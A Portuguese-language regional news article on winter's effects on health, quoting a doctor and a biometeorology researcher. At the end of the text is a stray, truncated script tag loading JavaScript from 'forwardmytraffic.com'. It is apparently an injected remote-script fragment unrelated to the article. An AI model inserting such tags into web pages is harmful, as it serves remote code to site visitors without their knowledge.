InícioDestaqueManual Para o Inverno

Manual Para o Inverno

Últimas notícias

Senado aprova isenção de IR para quem ganha até dois salários mínimos

O Senado aprovou nesta quarta-feira (17) o projeto de...

Mega-Sena sorteia nesta quinta-feira prêmio acumulado em R$ 72 milhões

As seis dezenas do concurso 2.714 da Mega-Sena serão...

Pinhão, pipoteca e maconha; Polícia militar prende traficante em Três Barras

Na quarta-feira, 17, por volta das 18h10, policiais militares...

Para alguns, inverno é sinônimo de doenças, preguiça, mal-estar. Para outros, a estação significa ânimo renovado, saúde, vontade de se mexer. Com a chegada do frio, o corpo humano passa por diversas adaptações para se adequar à exposição a uma temperatura muito abaixo daquela em que precisa se manter (em torno dos 36°C).

 

 

É neste período do ano que surgem a necessidade de mais roupas, a vontade de comer mais e a maior predisposição a problemas respiratórios. A saúde sofre impacto direto. O inverno facilita a transmissão de vírus, e gripes e resfriados tornam-se mais comuns. Especialmente porque, em busca de calor, acabamos ficando mais em ambientes fechados.

 

 

— A tendência em meio ao frio, na área urbana, é de as pessoas se aglomerarem, e também por isso aumentam os riscos de se contrair infecções virais e bacterianas — explica o médico intensivista Sergio Brodt.

 

 

Urupema, na Serra de SC, tem sensação térmica de -18ºC neste domingo

 

Ainda que de maneira diferente, todas as pessoas estão sujeitas aos efeitos do frio, como mudanças na alimentação, imunidade e disposição. Mas o que explica o maniqueísmo com que se vê o inverno – para uns, uma benção, para outros, um aborrecimento? É que cada um reage de maneira diferente. Há muitas variáveis envolvidas. Talvez a mente seja a principal mandante na hora de definir se alguém gosta ou não da estação, mas gênero, idade e composição corporal também têm papel fundamental nessa história.

 

 

— Hábitos alimentares, local onde se vive e metabolismo contribuem para que cada um sinta o frio de maneira diferente — diz Anderson Spohr Nedel, pesquisador em biometeorologia humana, campo que estuda efeitos do clima no organismo.

 

 

Preparado para entender mais sobre os efeitos do frio no corpo? Então, aconchegue-se, certifique-se de que está aquecido e confira um manual de sobrevivência para este inverno…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.